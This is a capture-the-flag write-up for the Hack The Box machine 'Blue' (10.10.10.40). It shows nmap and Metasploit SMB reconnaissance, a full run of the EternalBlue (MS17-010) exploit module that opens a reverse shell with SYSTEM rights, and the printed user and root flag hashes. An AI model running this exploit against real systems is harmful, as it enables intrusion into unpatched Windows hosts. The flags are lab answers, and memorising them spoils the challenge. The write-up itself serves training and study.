Blue Write-Up

Machine IP - 10.10.10.40

Initial Phase

Starting with an nmap scan -

root@kali:~/Desktop/Hack The Box/blue# nmap -F 10.10.10.40 Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-12 12:52 +04 Nmap scan report for 10.10.10.40 Host is up (0.23s latency). Not shown: 91 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown 49157/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 1.29 seconds

We see the MSB ports here and a bunch of ports in the 49000 series. These ports seem insignificant as of now, therefore turning to the SMB ports, we can do a bit of recon using the scanners in metasploit -

msf5 > search scanner/smb Matching Modules ================ Name Disclosure Date Rank Check Description ---- --------------- ---- ----- ----------- auxiliary/scanner/smb/impacket/dcomexec 2018-03-19 normal Yes DCOM Exec auxiliary/scanner/smb/impacket/secretsdump normal Yes DCOM Exec auxiliary/scanner/smb/impacket/wmiexec 2018-03-19 normal Yes WMI Exec auxiliary/scanner/smb/pipe_auditor normal Yes SMB Session Pipe Auditor auxiliary/scanner/smb/pipe_dcerpc_auditor normal Yes SMB Session Pipe DCERPC Auditor auxiliary/scanner/smb/psexec_loggedin_users normal Yes Microsoft Windows Authenticated Logged In Users Enumeration auxiliary/scanner/smb/smb1 normal Yes SMBv1 Protocol Detection auxiliary/scanner/smb/smb2 normal Yes SMB 2.0 Protocol Detection auxiliary/scanner/smb/smb_enum_gpp normal Yes SMB Group Policy Preference Saved Passwords Enumeration auxiliary/scanner/smb/smb_enumshares normal Yes SMB Share Enumeration auxiliary/scanner/smb/smb_enumusers normal Yes SMB User Enumeration (SAM EnumUsers) auxiliary/scanner/smb/smb_enumusers_domain normal Yes SMB Domain User Enumeration auxiliary/scanner/smb/smb_login normal Yes SMB Login Check Scanner auxiliary/scanner/smb/smb_lookupsid normal Yes SMB SID User Enumeration (LookupSid) auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection auxiliary/scanner/smb/smb_uninit_cred normal Yes Samba _netr_ServerPasswordSet Uninitialized Credential State auxiliary/scanner/smb/smb_version normal Yes SMB Version Detection msf5 > use auxiliary/scanner/smb/smb_version msf5 auxiliary(scanner/smb/smb_version) > set RHOST 10.10.10.40 RHOST => 10.10.10.40 msf5 auxiliary(scanner/smb/smb_version) > run [+] 10.10.10.40:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:HARIS-PC) [*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed

Attack Phase

The version result gives the operating system as Windows 7 Professional SP1, which gives us a lue to search along the lines 'windows 7 sp1 exploit smb'. This gives us the details of a CVE famous as the name Eternal Blue (the name of the box is also a giveaway for the same). We can get the metasploit module name for the same using rapid7 website. Using the same exploit, we can get the admin shell as follows -

msf5 auxiliary(scanner/smb/smb_version) > use exploit/windows/smb/ms17_010_eternalblue msf5 exploit(windows/smb/ms17_010_eternalblue) > show options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. VERIFY_TARGET true yes Check if remote OS matches exploit Target. Exploit target: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 10.10.10.40 RHOST => 10.10.10.40 msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on 10.10.14.68:4444 [*] 10.10.10.40:445 - Connecting to target for exploitation. [+] 10.10.10.40:445 - Connection established for exploitation. [+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply [*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes) [*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes [*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv [*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1 [+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations. [*] 10.10.10.40:445 - Sending all but last fragment of exploit packet [*] 10.10.10.40:445 - Starting non-paged pool grooming [+] 10.10.10.40:445 - Sending SMBv2 buffers [+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 10.10.10.40:445 - Sending final SMBv2 buffers. [*] 10.10.10.40:445 - Sending last fragment of exploit packet! [*] 10.10.10.40:445 - Receiving response from exploit packet [+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 10.10.10.40:445 - Sending egg to corrupted connection. [*] 10.10.10.40:445 - Triggering free of corrupted buffer. [-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [*] 10.10.10.40:445 - Connecting to target for exploitation. [+] 10.10.10.40:445 - Connection established for exploitation. [+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply [*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes) [*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes [*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv [*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1 [+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 10.10.10.40:445 - Trying exploit with 17 Groom Allocations. [*] 10.10.10.40:445 - Sending all but last fragment of exploit packet [*] 10.10.10.40:445 - Starting non-paged pool grooming [+] 10.10.10.40:445 - Sending SMBv2 buffers [+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 10.10.10.40:445 - Sending final SMBv2 buffers. [*] 10.10.10.40:445 - Sending last fragment of exploit packet! [*] 10.10.10.40:445 - Receiving response from exploit packet [+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 10.10.10.40:445 - Sending egg to corrupted connection. [*] 10.10.10.40:445 - Triggering free of corrupted buffer. [*] Command shell session 1 opened (10.10.14.68:4444 -> 10.10.10.40:49160) at 2019-04-12 12:56:37 +0400 [+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= C:\Windows\system32>whoami whoami nt authority\system C:\Windows\system32>cd ../.. cd ../.. C:\>dir dir Volume in drive C has no label. Volume Serial Number is A0EF-1911 Directory of C:\ 14/07/2009 04:20 <DIR> PerfLogs 24/12/2017 03:23 <DIR> Program Files 14/07/2017 17:58 <DIR> Program Files (x86) 14/07/2017 14:48 <DIR> Share 21/07/2017 07:56 <DIR> Users 11/04/2019 09:42 <DIR> Windows 0 File(s) 0 bytes 6 Dir(s) 14,963,478,528 bytes free C:\>cd Users cd Users C:\Users>dir dir Volume in drive C has no label. Volume Serial Number is A0EF-1911 Directory of C:\Users 21/07/2017 07:56 <DIR> . 21/07/2017 07:56 <DIR> .. 21/07/2017 07:56 <DIR> Administrator 14/07/2017 14:45 <DIR> haris 12/04/2011 08:51 <DIR> Public 0 File(s) 0 bytes 5 Dir(s) 14,963,478,528 bytes free C:\Users>cd haris\Desktop cd haris\Desktop C:\Users\haris\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is A0EF-1911 Directory of C:\Users\haris\Desktop 24/12/2017 03:23 <DIR> . 24/12/2017 03:23 <DIR> .. 21/07/2017 07:54 32 user.txt 1 File(s) 32 bytes 2 Dir(s) 14,963,478,528 bytes free C:\Users\haris\Desktop>type user.txt type user.txt 4c546aea7dbee75cbd71de245c8deea9 C:\Users\haris\Desktop>cd ../.. cd ../.. C:\Users>cd Administrator\Desktop cd Administrator\Desktop C:\Users\Administrator\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is A0EF-1911 Directory of C:\Users\Administrator\Desktop 24/12/2017 03:22 <DIR> . 24/12/2017 03:22 <DIR> .. 21/07/2017 07:57 32 root.txt 1 File(s) 32 bytes 2 Dir(s) 14,963,478,528 bytes free C:\Users\Administrator\Desktop>type root.txt type root.txt ff548eb71e920ff6c08843ce9df4e717

Thus we get both the root and user flags.